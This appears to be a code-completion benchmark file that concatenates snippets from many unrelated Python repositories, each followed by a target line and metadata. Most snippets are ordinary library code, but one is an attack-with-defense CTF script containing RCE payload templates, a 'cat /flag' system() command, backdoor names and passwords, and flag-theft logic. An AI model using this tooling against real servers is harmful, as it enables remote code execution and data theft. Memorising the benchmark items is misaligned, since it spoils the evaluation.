ijk_to_ras: 4×4 affine transformation matrix containing the mapping
from voxel indices to RAS+ (left → right, posterior → anterior,
inferior → superior) coordinates. If not specified, the identity
matrix is used.
Tip:
To learn more about coordinates systems, check the following resources:
- [NiBabel](https://nipy.org/nibabel/)'s [Coordinate systems and affines](https://nipy.org/nibabel/coordinate_systems.html),
- [3D Slicer](https://www.slicer.org/)'s [Coordinate systems](https://slicer.readthedocs.io/en/latest/user_guide/coordinate_systems.html),
- [FSL](https://fsl.fmrib.ox.ac.uk/)'s [docs (see "Background information on NIfTI Orientation")](https://fsl.fmrib.ox.ac.uk/fsl/fslwiki/Orientation%20Explained)
""" # noqa: E501
def __init__(
self,
array: npt.ArrayLike,
ijk_to_ras: npt.ArrayLike | None = None,
):
self.array = np.array(array)
if ijk_to_ras is None:
ijk_to_ras = np.eye(4)
self.ijk_to_ras = np.array(ijk_to_ras, dtype=np.float64)
if self.array.ndim != 3:
raise ValueError(
f"Array must have 3 dimensions, got shape {self.array.shape}"
)
if self.ijk_to_ras.shape != (4, 4):
raise ValueError(
f"ijk_to_ras must have shape (4, 4), got {self.ijk_to_ras.shape}"
)
assert self.ijk_to_ras.shape == (4, 4)
@classmethod
def open(cls, path: TypePath) -> JpegVolume:
"""Open a JVol file.
Args:
path: Path to a file with `'.jvol'` extension.
"""
path = Path(path)
if not path.is_file():
raise FileNotFoundError(f'File not found: "{path}"')
if path.suffix != ".jvol":
raise ValueError(f'File must have .jvol extension, got "{path}"')
| from __future__ import annotations
TypePath: TypeAlias = Union[str, os.PathLike]
class JpegVolume:
"""Base class for saving and loading JPEG-encoded volumes.
Args:
array: 3D NumPy array.
ijk_to_ras: 4×4 affine transformation matrix containing the mapping
from voxel indices to RAS+ (left → right, posterior → anterior,
inferior → superior) coordinates. If not specified, the identity
matrix is used.
Tip:
To learn more about coordinates systems, check the following resources:
- [NiBabel](https://nipy.org/nibabel/)'s [Coordinate systems and affines](https://nipy.org/nibabel/coordinate_systems.html),
- [3D Slicer](https://www.slicer.org/)'s [Coordinate systems](https://slicer.readthedocs.io/en/latest/user_guide/coordinate_systems.html),
- [FSL](https://fsl.fmrib.ox.ac.uk/)'s [docs (see "Background information on NIfTI Orientation")](https://fsl.fmrib.ox.ac.uk/fsl/fslwiki/Orientation%20Explained)
""" # noqa: E501
def __init__(
self,
array: npt.ArrayLike,
ijk_to_ras: npt.ArrayLike | None = None,
):
self.array = np.array(array)
if ijk_to_ras is None:
ijk_to_ras = np.eye(4)
self.ijk_to_ras = np.array(ijk_to_ras, dtype=np.float64)
if self.array.ndim != 3:
raise ValueError(
f"Array must have 3 dimensions, got shape {self.array.shape}"
)
if self.ijk_to_ras.shape != (4, 4):
raise ValueError(
f"ijk_to_ras must have shape (4, 4), got {self.ijk_to_ras.shape}"
)
assert self.ijk_to_ras.shape == (4, 4)
@classmethod
def open(cls, path: TypePath) -> JpegVolume:
"""Open a JVol file.
Args:
path: Path to a file with `'.jvol'` extension.
"""
path = Path(path)
if not path.is_file():
raise FileNotFoundError(f'File not found: "{path}"')
if path.suffix != ".jvol":
raise ValueError(f'File must have .jvol extension, got "{path}"')
| return cls(*open_jvol(path)) | 0 | 2023-11-12 18:41:36+00:00 | 2k |
iramluism/basel | tests/unit_tests/components/component_test.py | [
{
"identifier": "Component",
"path": "basel/components/components.py",
"snippet": "class Component(metaclass=abc.ABCMeta):\n def __init__(\n self,\n name: str,\n nodes: List[Node] = None,\n instability: Optional[float] = 1,\n abstraction: Optional[float] = 1,\n ... | from basel.components import Component
from basel.components.classes import ClassNode
from basel.components.modules import ModuleNode
import pytest | 777 |
@pytest.mark.parametrize(
"component,expected_classes",
[
(
Component(
name="Componant_A",
nodes=[
|
@pytest.mark.parametrize(
"component,expected_classes",
[
(
Component(
name="Componant_A",
nodes=[ | ModuleNode( | 2 | 2023-11-18 13:47:55+00:00 | 2k |
Gr-1m/AWD-Frame-ByGr1m | modules/Attack.py | [
{
"identifier": "FRAME_DIR",
"path": "Configs/frame_config.py",
"snippet": "FRAME_DIR = _os.path.dirname(_os.path.dirname(__file__))"
},
{
"identifier": "FlagRegular",
"path": "Configs/config.py",
"snippet": "API_URL = 'http://kaming/awduse/submit.php'"
},
{
"identifier": "printX... | from Configs.frame_config import FRAME_DIR
from Configs.config import FlagRegular
from func.CmdColors import printX
from modules.ReplaceStr import *
from urllib.parse import urlparse as URL
import requests, pymysql, paramiko, socket
import hashlib, base64
import os as _os
import re | 1,329 | #!/usr/bin/python3
# -*- coding: UTF-8 -*-
"""
@project : customGr1m
@file : Attack.py
@Author : Gr%1m
@Date : 14/11/2023 10:56 am
"""
# from pwn import *
# About Flag
Flags = set()
FlagPath = '/flag'
FlagLen = 41
# Payload INFO
Payloads = {
f"http://POST@{HostReplaceStr}:80/awdtest/testback.php?submit=submit&bb={RceReplaceStr}",
}
WebRootDir = '/var/www/html'
LoginCookie = 'security=low; PHPSESSID=e16f5c982733368120234560b9cb5625'
BDFileName = 'a10uN7yA_1'
BDcmdPass = 'x2aom1ng_20231114'
BDRceParam = 'kAt3l1na'
MemShell = set()
# todo: attack
# Enemy INFO
X = 'x'
def _up_payloads(data):
Payloads.add(data)
def submit_flag(submitAPI, token, flag):
try:
if submitAPI[-1] == 'GET':
url = f'{submitAPI[0]}?{submitAPI[1]}={token}&{submitAPI[2]}={flag}'
res = requests.get(url=url)
elif submitAPI[-1] == 'POST':
res = requests.post(url=submitAPI[0], data={submitAPI[1]: token, submitAPI[2]: flag})
else:
printX("[!] please set SubmitAPI method")
return "No", 400
return res.text, res.status_code
except KeyboardInterrupt:
printX('[-] Interrupt Submit Flag')
return 0, 0
except Exception:
return 0, 0
def _attack_vul(hostname, payload, cmd):
purl = URL(payload)
method, payload = purl.username, payload.split(f'@{HostReplaceStr}')[-1]
payload = payload.replace(RceReplaceStr, cmd)
url = f'http://{hostname}{payload}'
try:
if method == 'GET':
res = requests.get(url=url, headers={'Cookie': LoginCookie})
elif method == 'POST':
params = payload.split('?', maxsplit=1)[-1]
data = {_.split('=', maxsplit=1)[0]: _.split('=', maxsplit=1)[1] for _ in params.split('&')}
res = requests.post(url, data=data, headers={'Cookie': LoginCookie})
else:
printX(f'[-] Not Allow Method in payload {payload}')
raise NameError
except:
class _X:
def __init__(self):
self.text = None
self.status_code = 400
res = _X()
return res, purl
def get_flag(ey_hosts, rce="system('cat /flag');"):
def extract_flag(text):
try:
| #!/usr/bin/python3
# -*- coding: UTF-8 -*-
"""
@project : customGr1m
@file : Attack.py
@Author : Gr%1m
@Date : 14/11/2023 10:56 am
"""
# from pwn import *
# About Flag
Flags = set()
FlagPath = '/flag'
FlagLen = 41
# Payload INFO
Payloads = {
f"http://POST@{HostReplaceStr}:80/awdtest/testback.php?submit=submit&bb={RceReplaceStr}",
}
WebRootDir = '/var/www/html'
LoginCookie = 'security=low; PHPSESSID=e16f5c982733368120234560b9cb5625'
BDFileName = 'a10uN7yA_1'
BDcmdPass = 'x2aom1ng_20231114'
BDRceParam = 'kAt3l1na'
MemShell = set()
# todo: attack
# Enemy INFO
X = 'x'
def _up_payloads(data):
Payloads.add(data)
def submit_flag(submitAPI, token, flag):
try:
if submitAPI[-1] == 'GET':
url = f'{submitAPI[0]}?{submitAPI[1]}={token}&{submitAPI[2]}={flag}'
res = requests.get(url=url)
elif submitAPI[-1] == 'POST':
res = requests.post(url=submitAPI[0], data={submitAPI[1]: token, submitAPI[2]: flag})
else:
printX("[!] please set SubmitAPI method")
return "No", 400
return res.text, res.status_code
except KeyboardInterrupt:
printX('[-] Interrupt Submit Flag')
return 0, 0
except Exception:
return 0, 0
def _attack_vul(hostname, payload, cmd):
purl = URL(payload)
method, payload = purl.username, payload.split(f'@{HostReplaceStr}')[-1]
payload = payload.replace(RceReplaceStr, cmd)
url = f'http://{hostname}{payload}'
try:
if method == 'GET':
res = requests.get(url=url, headers={'Cookie': LoginCookie})
elif method == 'POST':
params = payload.split('?', maxsplit=1)[-1]
data = {_.split('=', maxsplit=1)[0]: _.split('=', maxsplit=1)[1] for _ in params.split('&')}
res = requests.post(url, data=data, headers={'Cookie': LoginCookie})
else:
printX(f'[-] Not Allow Method in payload {payload}')
raise NameError
except:
class _X:
def __init__(self):
self.text = None
self.status_code = 400
res = _X()
return res, purl
def get_flag(ey_hosts, rce="system('cat /flag');"):
def extract_flag(text):
try: | flag = re.search(FlagRegular, text).group() | 1 | 2023-11-17 09:12:03+00:00 | 2k |
Wolfsauge/async_summarize | async_helpers.py | [
{
"identifier": "get_length_of_chunk_in_tokens",
"path": "sync_helpers.py",
"snippet": "def get_length_of_chunk_in_tokens(my_chunk: str, buck_slip: dict) -> int:\n my_result = buck_slip[\"tokenizer\"](my_chunk)\n input_ids = my_result.input_ids\n length_of_chunk_in_tokens = len(input_ids)\n\n ... | import sys
import asyncio
import math
from tqdm.asyncio import tqdm # type: ignore
from icecream import ic # type: ignore
from sync_helpers import (
get_length_of_chunk_in_tokens,
get_text_splitter,
grouped,
find_chunk_pair_with_minimal_size,
find_longest_element_index,
calc_custom_chunking_parameters,
) | 1,590 |
async def get_completion(buck_slip: dict, task: str, **kwargs) -> str:
template = buck_slip["jinja2_env"].from_string(buck_slip["prompt_templates"][task])
if task == "summarize":
chunk = kwargs["chunk"]
if isinstance(chunk, str):
my_prompt = template.render(prompt=chunk)
else:
ic(f"ERROR: function call error, task: {task}, kwargs={kwargs}.")
sys.exit(1)
elif task == "merge":
first_element = kwargs["first_element"]
second_element = kwargs["second_element"]
if isinstance(first_element, str) and isinstance(second_element, str):
my_prompt = template.render(
first_element=first_element, second_element=second_element
)
else:
ic(f"ERROR: function call error, task: {task}, kwargs={kwargs}.")
sys.exit(1)
else:
ic(f"ERROR: function call error, task: {task}, kwargs={kwargs}.")
sys.exit(1)
bad_counter = 0
attempt_counter = 0
while attempt_counter <= buck_slip["max_completion_retries"]:
my_temperature = buck_slip["temperature"] + attempt_counter * 0.1
completion = await buck_slip["api_client"].completions.create(
model=buck_slip["model_local_identifier"],
prompt=my_prompt,
max_tokens=buck_slip["max_tokens"],
temperature=my_temperature,
)
attempt_counter += 1
finish_reason = completion.choices[0].finish_reason
if finish_reason == "stop":
break
bad_counter += 1
ic(completion)
ic(attempt_counter)
ic(bad_counter)
ic(finish_reason)
ic("ERROR: finish_reason != 'stop', retrying.")
if bad_counter >= buck_slip["max_completion_retries"]:
ic(completion)
ic(attempt_counter)
ic(bad_counter)
ic(finish_reason)
ic("ERROR: aborting after multiple failed attempts.")
sys.exit(1)
return completion.choices[0].text
async def do_chunking_step(my_chunk: str, buck_slip: dict) -> list:
lock = buck_slip["lock"]
tqdm.write(f"Acquired {lock}.")
async with lock:
chunks = buck_slip["text_splitter"].split_text(my_chunk)
tqdm.write(f"Released {lock}.")
return chunks
async def merge_elements(elements, buck_slip: dict, pindex: int) -> tuple[str, int]:
first_element, second_element = elements
intermediate_merge_result = await get_completion(
buck_slip, "merge", first_element=first_element, second_element=second_element
)
intermediate_merge_result = str(intermediate_merge_result).strip()
return intermediate_merge_result, pindex
async def summarize_element(chunk, buck_slip: dict, pindex: int) -> tuple[str, int]:
intermediate_merge_result = await get_completion(
buck_slip, "summarize", chunk=chunk
)
intermediate_merge_result = str(intermediate_merge_result).strip()
return intermediate_merge_result, pindex
async def split_further(partial_results: list, my_pos: int, buck_slip: dict) -> list:
ic("Split further.")
ic(my_pos)
ic(len(partial_results))
my_len_list = [len(_) for _ in partial_results]
ic(my_len_list)
my_chunk = partial_results[my_pos]
lock = buck_slip["lock"]
tqdm.write(f"Acquired {lock}.")
async with lock:
length_of_chunk_in_tokens = get_length_of_chunk_in_tokens(my_chunk, buck_slip)
tqdm.write(f"Released {lock}.")
my_custom_chunk_size = length_of_chunk_in_tokens
my_custom_chunk_overlap = 0
|
async def get_completion(buck_slip: dict, task: str, **kwargs) -> str:
template = buck_slip["jinja2_env"].from_string(buck_slip["prompt_templates"][task])
if task == "summarize":
chunk = kwargs["chunk"]
if isinstance(chunk, str):
my_prompt = template.render(prompt=chunk)
else:
ic(f"ERROR: function call error, task: {task}, kwargs={kwargs}.")
sys.exit(1)
elif task == "merge":
first_element = kwargs["first_element"]
second_element = kwargs["second_element"]
if isinstance(first_element, str) and isinstance(second_element, str):
my_prompt = template.render(
first_element=first_element, second_element=second_element
)
else:
ic(f"ERROR: function call error, task: {task}, kwargs={kwargs}.")
sys.exit(1)
else:
ic(f"ERROR: function call error, task: {task}, kwargs={kwargs}.")
sys.exit(1)
bad_counter = 0
attempt_counter = 0
while attempt_counter <= buck_slip["max_completion_retries"]:
my_temperature = buck_slip["temperature"] + attempt_counter * 0.1
completion = await buck_slip["api_client"].completions.create(
model=buck_slip["model_local_identifier"],
prompt=my_prompt,
max_tokens=buck_slip["max_tokens"],
temperature=my_temperature,
)
attempt_counter += 1
finish_reason = completion.choices[0].finish_reason
if finish_reason == "stop":
break
bad_counter += 1
ic(completion)
ic(attempt_counter)
ic(bad_counter)
ic(finish_reason)
ic("ERROR: finish_reason != 'stop', retrying.")
if bad_counter >= buck_slip["max_completion_retries"]:
ic(completion)
ic(attempt_counter)
ic(bad_counter)
ic(finish_reason)
ic("ERROR: aborting after multiple failed attempts.")
sys.exit(1)
return completion.choices[0].text
async def do_chunking_step(my_chunk: str, buck_slip: dict) -> list:
lock = buck_slip["lock"]
tqdm.write(f"Acquired {lock}.")
async with lock:
chunks = buck_slip["text_splitter"].split_text(my_chunk)
tqdm.write(f"Released {lock}.")
return chunks
async def merge_elements(elements, buck_slip: dict, pindex: int) -> tuple[str, int]:
first_element, second_element = elements
intermediate_merge_result = await get_completion(
buck_slip, "merge", first_element=first_element, second_element=second_element
)
intermediate_merge_result = str(intermediate_merge_result).strip()
return intermediate_merge_result, pindex
async def summarize_element(chunk, buck_slip: dict, pindex: int) -> tuple[str, int]:
intermediate_merge_result = await get_completion(
buck_slip, "summarize", chunk=chunk
)
intermediate_merge_result = str(intermediate_merge_result).strip()
return intermediate_merge_result, pindex
async def split_further(partial_results: list, my_pos: int, buck_slip: dict) -> list:
ic("Split further.")
ic(my_pos)
ic(len(partial_results))
my_len_list = [len(_) for _ in partial_results]
ic(my_len_list)
my_chunk = partial_results[my_pos]
lock = buck_slip["lock"]
tqdm.write(f"Acquired {lock}.")
async with lock:
length_of_chunk_in_tokens = get_length_of_chunk_in_tokens(my_chunk, buck_slip)
tqdm.write(f"Released {lock}.")
my_custom_chunk_size = length_of_chunk_in_tokens
my_custom_chunk_overlap = 0 | buck_slip["text_splitter"] = get_text_splitter( | 1 | 2023-11-16 01:51:17+00:00 | 2k |
balazsborsos/dae_postprocessing | main.py | [
{
"identifier": "ConfigurationParser",
"path": "utils/parser.py",
"snippet": "class ConfigurationParser:\n def __init__(self):\n self.parser = argparse.ArgumentParser(description='Script for training or evaluation with configuration.')\n\n # Argument to specify mode (train or evaluation... | from utils.parser import ConfigurationParser, parse_yaml_config
from train import train_model | 690 |
if __name__ == "__main__":
config_parser = ConfigurationParser()
args = config_parser.parse_args()
|
if __name__ == "__main__":
config_parser = ConfigurationParser()
args = config_parser.parse_args()
| config = parse_yaml_config(args.config) | 1 | 2023-11-18 13:57:25+00:00 | 2k |
htyao89/Textual-based_Class-aware_prompt_tuning | clip/clip.py | [
{
"identifier": "build_model",
"path": "clip/model.py",
"snippet": "def build_model(state_dict: dict):\n vit = \"visual.proj\" in state_dict\n\n if vit:\n vision_width = state_dict[\"visual.conv1.weight\"].shape[0]\n vision_layers = len([k for k in state_dict.keys() if k.startswith(\... | import hashlib
import os
import urllib
import warnings
import torch
from typing import Any, Union, List
from pkg_resources import packaging
from PIL import Image
from torchvision.transforms import Compose, Resize, CenterCrop, ToTensor, Normalize
from tqdm import tqdm
from .model import build_model
from .simple_tokenizer import SimpleTokenizer as _Tokenizer
from torchvision.transforms import InterpolationMode | 1,515 |
try:
BICUBIC = InterpolationMode.BICUBIC
except ImportError:
BICUBIC = Image.BICUBIC
if packaging.version.parse(torch.__version__) < packaging.version.parse("1.7.1"):
warnings.warn("PyTorch version 1.7.1 or higher is recommended")
__all__ = ["available_models", "load", "tokenize"]
|
try:
BICUBIC = InterpolationMode.BICUBIC
except ImportError:
BICUBIC = Image.BICUBIC
if packaging.version.parse(torch.__version__) < packaging.version.parse("1.7.1"):
warnings.warn("PyTorch version 1.7.1 or higher is recommended")
__all__ = ["available_models", "load", "tokenize"] | _tokenizer = _Tokenizer() | 0 | 2023-11-14 03:50:33+00:00 | 2k |
Veridise/vanguard-aleo | vanguard/aleo/detectors/infoleak.py | [
{
"identifier": "get_ifg_edges",
"path": "vanguard/aleo/common.py",
"snippet": "def get_ifg_edges(prog, func, hash=False, call=False, inline=False):\n \"\"\"Get information flow graph edges.\n Args:\n - prog: \n - func\n - hash (default: False): whether to treat a hash function call... | import networkx as nx
from ..common import get_ifg_edges, trim_inst | 1,134 |
def detector_infoleak(prog, func):
"""Detect for information leak
Args:
- prog:
- func:
Rets: (result, info)
"""
|
def detector_infoleak(prog, func):
"""Detect for information leak
Args:
- prog:
- func:
Rets: (result, info)
"""
| edges = get_ifg_edges(prog, func, hash=False, call=True, inline=False) | 0 | 2023-11-10 02:57:03+00:00 | 2k |
winrey/x-following | check_following.py | [
{
"identifier": "client",
"path": "client.py",
"snippet": "class MyUser(TypedDict):\nclass TimelineUserEntitiesDescription(TypedDict):\nclass TimelineUserEntitiesURL(TypedDict):\nclass TimelineUserEntities(TypedDict):\nclass TimelineUserLegacy(TypedDict):\nclass TimelineUser(TypedDict):\nclass Following... | import json
from typing import List
from client import client, FollowingUser
from common_cli import select_account, trials
from back_white_list import filter_not_in_whitelist, filter_not_in_blacklist | 1,039 |
FOLLOWING_CACHE_PATH = 'cache/followings.json'
def load_followings():
try:
with open(FOLLOWING_CACHE_PATH, 'r') as f:
return json.load(f)
except FileNotFoundError:
return False
def get_all_followings(force_update=False):
followings = load_followings()
if followings and not force_update:
return followings
followings = client.get_all_following_by_graphql(50)
print("saving followings...")
with open('cache/followings.json', 'w') as f:
json.dump(followings, f)
return followings
def filter_one_way_followings(followings: List[FollowingUser]):
one_way_followings = []
for following in followings:
if "followed_by" not in following or not following["followed_by"]:
one_way_followings.append(following)
return one_way_followings
def is_public_account(following: FollowingUser):
if following["verified"]:
return True
followers_count = following.get("followers_count", 0)
following_count = following.get("following_count", 0)
if following_count < 100 and followers_count > 2000:
return True
if following_count == 0:
return False
return followers_count / following_count > 30
def filter_not_public_accounts(followings: List[FollowingUser]):
return [following for following in followings if not is_public_account(following)]
def main_trails():
select_account()
followings = get_all_followings()
subjects = filter_one_way_followings(followings)
subjects = filter_not_public_accounts(subjects)
subjects = filter_not_in_whitelist(subjects)
subjects = filter_not_in_blacklist(subjects)
|
FOLLOWING_CACHE_PATH = 'cache/followings.json'
def load_followings():
try:
with open(FOLLOWING_CACHE_PATH, 'r') as f:
return json.load(f)
except FileNotFoundError:
return False
def get_all_followings(force_update=False):
followings = load_followings()
if followings and not force_update:
return followings
followings = client.get_all_following_by_graphql(50)
print("saving followings...")
with open('cache/followings.json', 'w') as f:
json.dump(followings, f)
return followings
def filter_one_way_followings(followings: List[FollowingUser]):
one_way_followings = []
for following in followings:
if "followed_by" not in following or not following["followed_by"]:
one_way_followings.append(following)
return one_way_followings
def is_public_account(following: FollowingUser):
if following["verified"]:
return True
followers_count = following.get("followers_count", 0)
following_count = following.get("following_count", 0)
if following_count < 100 and followers_count > 2000:
return True
if following_count == 0:
return False
return followers_count / following_count > 30
def filter_not_public_accounts(followings: List[FollowingUser]):
return [following for following in followings if not is_public_account(following)]
def main_trails():
select_account()
followings = get_all_followings()
subjects = filter_one_way_followings(followings)
subjects = filter_not_public_accounts(subjects)
subjects = filter_not_in_whitelist(subjects)
subjects = filter_not_in_blacklist(subjects)
| trials(subjects) | 2 | 2023-11-11 18:54:25+00:00 | 2k |
Shritesh99/strawberry-django-social-auth | gql_social_auth/mixins.py | [
{
"identifier": "social_auth",
"path": "gql_social_auth/decorators.py",
"snippet": "def social_auth(f):\n \"\"\"\n Decorator for Getting social User. Use this decorator if you want to customize the SocialAuthMixin.\n :param f: Input: SocialAuthInput(provider, accessToken)\n :return: function... | from strawberry.types import Info
from gqlauth.user.resolvers import BaseMixin
from .decorators import social_auth
from .types import SocialAuthInput
from .types import SocialType | 673 |
class SocialAuthMixin(BaseMixin):
"""Social Auth takes OAuth Provider and OAuth Access Token
Allow user to perform social auth for the given OAuth provider and OAuth Access token
:returns
user: Entire User Object (Get your social data using user.social_user)
errors: Any error occurred in the process of getting the Social User
"""
@classmethod
|
class SocialAuthMixin(BaseMixin):
"""Social Auth takes OAuth Provider and OAuth Access Token
Allow user to perform social auth for the given OAuth provider and OAuth Access token
:returns
user: Entire User Object (Get your social data using user.social_user)
errors: Any error occurred in the process of getting the Social User
"""
@classmethod | @social_auth | 0 | 2023-11-12 23:27:04+00:00 | 2k |
Scholar01/ComfyUI-Keyframe | keyframe/samples.py | [
{
"identifier": "is_injected_model",
"path": "keyframe/util.py",
"snippet": "def is_injected_model(model):\n return hasattr(model, KEYFRAME_INJECTED_ATTR)"
},
{
"identifier": "get_injected_model",
"path": "keyframe/util.py",
"snippet": "def get_injected_model(model):\n return getat... | import torch
import comfy.samplers
from tqdm.auto import trange
from comfy.k_diffusion import sampling as k_diffusion_sampling
from comfy.k_diffusion.sampling import to_d, default_noise_sampler
from .util import is_injected_model, get_injected_model, generate_sigmas, generate_noise, get_ancestral_step | 665 |
CUSTOM_SAMPLERS = [
'k_euler', 'k_euler_a', 'k_lcm'
]
def inject_samples():
comfy.samplers.SAMPLER_NAMES.extend(CUSTOM_SAMPLERS)
k_diffusion_sampling.sample_k_euler = sample_k_euler
k_diffusion_sampling.sample_k_euler_a = sample_k_euler_a
k_diffusion_sampling.sample_k_lcm = sample_k_lcm
print(f'Injected samplers: {CUSTOM_SAMPLERS}')
def get_sigmas_noise(model_wrap, x, noise, latent_image, sigmas, scheduler, steps, part_group):
|
CUSTOM_SAMPLERS = [
'k_euler', 'k_euler_a', 'k_lcm'
]
def inject_samples():
comfy.samplers.SAMPLER_NAMES.extend(CUSTOM_SAMPLERS)
k_diffusion_sampling.sample_k_euler = sample_k_euler
k_diffusion_sampling.sample_k_euler_a = sample_k_euler_a
k_diffusion_sampling.sample_k_lcm = sample_k_lcm
print(f'Injected samplers: {CUSTOM_SAMPLERS}')
def get_sigmas_noise(model_wrap, x, noise, latent_image, sigmas, scheduler, steps, part_group): | sigmas = generate_sigmas(model_wrap.inner_model, x, sigmas, scheduler, steps, part_group, sigmas.device) | 2 | 2023-11-10 13:15:08+00:00 | 2k |
Hamidrezaostadabbas/FOSS4G_Asia_2023 | 03_Exercise_2/exercise_2/layout_generator/layout_generator.py | [
{
"identifier": "LayoutGeneratorDialog",
"path": "03_Exercise_2/exercise_2/layout_generator/layout_generator_dialog.py",
"snippet": "class LayoutGeneratorDialog(QtWidgets.QDialog, FORM_CLASS):\n def __init__(self, parent=None):\n \"\"\"Constructor.\"\"\"\n super(LayoutGeneratorDialog, s... | from qgis.PyQt.QtCore import QSettings, QTranslator, QCoreApplication
from qgis.PyQt.QtGui import QIcon
from qgis.PyQt.QtWidgets import QAction
from .resources import *
from .layout_generator_dialog import LayoutGeneratorDialog
from .core_functions import (
import_vector_layer, display_vector_layer, zoom_to_layer, qml_loader, get_script_path_plugin
)
from .layout import layout_executor
import os.path | 1,113 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
LayoutGenerator
A QGIS plugin
auto layout generator
Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/
-------------------
begin : 2023-11-24
git sha : $Format:%H$
copyright : (C) 2023 by foss4g-asia
email : info@foss4g-asia.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
class LayoutGenerator:
"""QGIS Plugin Implementation."""
def __init__(self, iface):
"""Constructor.
:param iface: An interface instance that will be passed to this class
which provides the hook by which you can manipulate the QGIS
application at run time.
:type iface: QgsInterface
"""
# Save reference to the QGIS interface
self.iface = iface
# new variables
| # -*- coding: utf-8 -*-
"""
/***************************************************************************
LayoutGenerator
A QGIS plugin
auto layout generator
Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/
-------------------
begin : 2023-11-24
git sha : $Format:%H$
copyright : (C) 2023 by foss4g-asia
email : info@foss4g-asia.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
class LayoutGenerator:
"""QGIS Plugin Implementation."""
def __init__(self, iface):
"""Constructor.
:param iface: An interface instance that will be passed to this class
which provides the hook by which you can manipulate the QGIS
application at run time.
:type iface: QgsInterface
"""
# Save reference to the QGIS interface
self.iface = iface
# new variables | self.layout_generator_dialog = LayoutGeneratorDialog() | 0 | 2023-11-17 09:40:49+00:00 | 2k |
micheltlutz/Winged-Python | winged/HTML/table.py | [
{
"identifier": "String",
"path": "winged/HTML/string.py",
"snippet": "class String(GenericElement):\n text = \"\"\n\n def __init__(self, str):\n super().__init__()\n self.text = str\n\n def get_string(self):\n return self.text\n\n def generate(self):\n print(self... | from winged.HTML.string import String
from winged.core.generic_element import GenericElement
from winged.core.tag import Tag
from winged.HTML.thead import THead
from winged.HTML.tbody import TBody
from winged.HTML.tr import Tr
from winged.HTML.th import Th
from winged.HTML.td import Td | 1,315 |
"""
The Table class is a specific implementation of the HTML 'table' tag in the Winged-Python library.
It provides helper methods to generate table structures.
Table creation involves creating headers (th), rows (tr), and data cells (td).
# Example Usage:
```python
table = Table()
table.add_table_headers(["Name", "Age", "Height", "Location"]) # Define headers
table.add_row()
table.add_in_row(String("John"))
table.add_in_row(String("25"))
table.add_in_row(String("1.80"))
table.add_in_row(String("New York"))
```
This would generate a table with mentioned headers and one row of data.
"""
class Table(Tag):
_tag = "table"
_container = True
_form_element = False
def __init__(self):
super().__init__()
self.tbody = TBody()
self.thead = None
self.rows = []
def add_table_headers(self, titles, aligns=None, classes=None):
|
"""
The Table class is a specific implementation of the HTML 'table' tag in the Winged-Python library.
It provides helper methods to generate table structures.
Table creation involves creating headers (th), rows (tr), and data cells (td).
# Example Usage:
```python
table = Table()
table.add_table_headers(["Name", "Age", "Height", "Location"]) # Define headers
table.add_row()
table.add_in_row(String("John"))
table.add_in_row(String("25"))
table.add_in_row(String("1.80"))
table.add_in_row(String("New York"))
```
This would generate a table with mentioned headers and one row of data.
"""
class Table(Tag):
_tag = "table"
_container = True
_form_element = False
def __init__(self):
super().__init__()
self.tbody = TBody()
self.thead = None
self.rows = []
def add_table_headers(self, titles, aligns=None, classes=None): | self.thead = THead() | 3 | 2023-11-18 17:40:48+00:00 | 2k |
davidhozic/TkClassWizard | tkclasswiz/object_frame/frame_string.py | [
{
"identifier": "extendable",
"path": "tkclasswiz/extensions.py",
"snippet": "@doc_category(\"Extensions\")\r\ndef extendable(obj: Union[T, list]) -> T:\r\n \"\"\"\r\n Decorator that makes the obj extendable.\r\n\r\n It wraps the ``obj``, which is a class or a function, into an extension object... | from typing import Any
from ..storage import *
from .frame_base import *
from ..extensions import extendable
from ..doc import doc_category
import tkinter as tk
| 1,400 |
TEXT_MAX_UNDO = 20
__all__ = (
"NewObjectFrameString",
)
|
TEXT_MAX_UNDO = 20
__all__ = (
"NewObjectFrameString",
)
| @extendable
| 0 | 2023-11-14 09:26:01+00:00 | 2k |
har777/snek-evm | test.py | [
{
"identifier": "EVM",
"path": "vm.py",
"snippet": "class EVM:\n def __init__(self):\n self.address_to_contract = {}\n\n def create_contract(self, bytecode, address):\n contract = Contract(bytecode=bytecode, address=address)\n self.address_to_contract[address] = contract\n ... | import unittest
from vm import EVM, TransactionMetadata, get_create_contract_address, get_create2_contract_address | 1,417 |
class UtilTestCase(unittest.TestCase):
def test_get_create_contract_address(self):
sender_address = "0x6ac7ea33f8831ea9dcc53393aaa88b25a785dbf0"
self.assertEqual(get_create_contract_address(sender_address=sender_address, sender_nonce=0),
"0xcd234a471b72ba2f1ccf0a70fcaba648a5eecd8d")
self.assertEqual(get_create_contract_address(sender_address=sender_address, sender_nonce=1),
"0x343c43a37d37dff08ae8c4a11544c718abb4fcf8")
self.assertEqual(get_create_contract_address(sender_address=sender_address, sender_nonce=2),
"0xf778b86fa74e846c4f0a1fbd1335fe81c00a0c91")
self.assertEqual(get_create_contract_address(sender_address=sender_address, sender_nonce=3),
"0xfffd933a0bc612844eaf0c6fe3e5b8e9b6c1d19c")
def test_get_create2_contract_address(self):
# https://eips.ethereum.org/EIPS/eip-1014
self.assertEqual(
get_create2_contract_address(
origin_address="0x0000000000000000000000000000000000000000",
salt=0,
initialisation_code="00"
),
"0x4d1a2e2bb4f88f0250f26ffff098b0b30b26bf38"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0xdeadbeef00000000000000000000000000000000",
salt=0,
initialisation_code="00"
),
"0xb928f69bb1d91cd65274e3c79d8986362984fda3"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0xdeadbeef00000000000000000000000000000000",
salt=1455368932401306996839762510191304720241787928576,
initialisation_code="00"
),
"0xd04116cdd17bebe565eb2422f2497e06cc1c9833"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0x0000000000000000000000000000000000000000",
salt=0,
initialisation_code="deadbeef"
),
"0x70f2b2914a2a4b783faefb75f459a580616fcb5e"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0x00000000000000000000000000000000deadbeef",
salt=3405691582,
initialisation_code="deadbeef"
),
